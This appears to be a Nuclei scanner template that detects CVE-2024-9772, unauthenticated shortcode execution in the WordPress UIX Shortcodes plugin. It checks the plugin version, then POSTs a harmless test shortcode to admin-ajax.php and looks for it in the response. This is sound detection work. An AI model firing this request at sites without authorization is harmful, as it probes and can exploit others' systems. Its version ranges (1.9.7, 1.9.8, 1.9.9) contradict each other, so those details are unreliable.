WordPress UIX Shortcodes <= 1.9.7 - Unauthenticated Shortcode Execution

id: CVE-2024-9772

info:
  name: WordPress UIX Shortcodes <= 1.9.7 - Unauthenticated Shortcode Execution
  author: kankburhan
  severity: high
  description: |
    The The Uix Shortcodes – Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
  impact: |
    Unauthenticated attackers can execute arbitrary shortcodes through the uixscform_ajax_shortcodepreview AJAX action, potentially leading to information disclosure, privilege escalation, or remote code execution depending on available shortcodes.
  remediation: |
    Update UIX Shortcodes plugin to the latest patched version (>= 1.9.8).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9772
    - https://downloads.wordpress.org/plugin/uix-shortcodes.1.9.7.zip
    - https://plugins.trac.wordpress.org/browser/uix-shortcodes/trunk/shortcodes/templates/default/frontpage-init.php#L9
    - https://wordpress.org/plugins/uix-shortcodes/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/3000758d-68e0-46a6-aef0-e2407a828168?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9772
    cwe-id: CWE-94
    epss-score: 0.01411
    epss-percentile: 0.69299
    cpe: cpe:2.3:a:uiux:uix_shortcodes:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: uiux
    product: uix_shortcodes
    framework: wordpress
    publicwww-query: "/wp-content/plugins/uix-shortcodes/"
  tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,shortcode,uix-shortcodes,vuln

variables:
  string: "{{to_lower('{{randstr}}')}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/uix-shortcodes/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Uix Shortcodes')"
          - "compare_versions(version, '<= 1.9.7')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=uixscform_ajax_shortcodepreview&previewcode=[uix_sc_text text='{{string}}']

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{string}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402204aa72e00f86ba4060479bd401e4be850b9bf5b6032bd5a029854ceeefd1be82f02206f1acbec72490f21df7c376f470f7540b45f3a237582c008016c0ad0e3e10b85:922c64590222798bb761d5b6d8e72950